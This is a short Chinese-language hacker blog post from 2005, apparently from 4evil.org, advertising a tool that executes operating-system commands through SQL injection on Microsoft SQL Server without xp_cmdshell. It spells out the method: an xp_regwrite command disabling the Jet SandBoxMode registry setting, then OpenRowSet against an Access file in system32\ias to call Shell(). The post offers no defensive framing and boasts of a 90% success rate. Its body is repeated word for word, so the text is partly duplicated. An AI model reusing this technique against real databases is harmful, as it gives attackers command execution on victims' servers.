2005-11-29 21:45:50 by: h4x0r
Access也可以做到在Injection中执行命令的工具
可以在sysadmin的权限下面执行命令..不需要xp_cmdshell\Sp_OA*\Job等扩展支持...
成功之后,Access也可以做到在Injection中执行命令...
成功率一般在90%以上....
原理:
第一:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engine\SandBoxMode',REG_DWORD,0 写一个注册表的值,开启Access沙盒模式。也就是可在非Application里执行的功能。
2,用OpenRowSet打开一个Access文件.在%windir%\system32\ias里有4个这样的文件。随便拿来用
3.执行的函数如下
Function Shell(ByVal Command As String) As Long
返回执行的PID
完成。
Click Here To Download
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=209
成功之后,Access也可以做到在Injection中执行命令...
成功率一般在90%以上....
原理:
第一:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engine\SandBoxMode',REG_DWORD,0 写一个注册表的值,开启Access沙盒模式。也就是可在非Application里执行的功能。
2,用OpenRowSet打开一个Access文件.在%windir%\system32\ias里有4个这样的文件。随便拿来用
3.执行的函数如下
Function Shell(ByVal Command As String) As Long
返回执行的PID
完成。
Click Here To Download
Comments Feed: http://www.4evil.org/feed.asp?q=comment&id=209
There is no comment on this article.
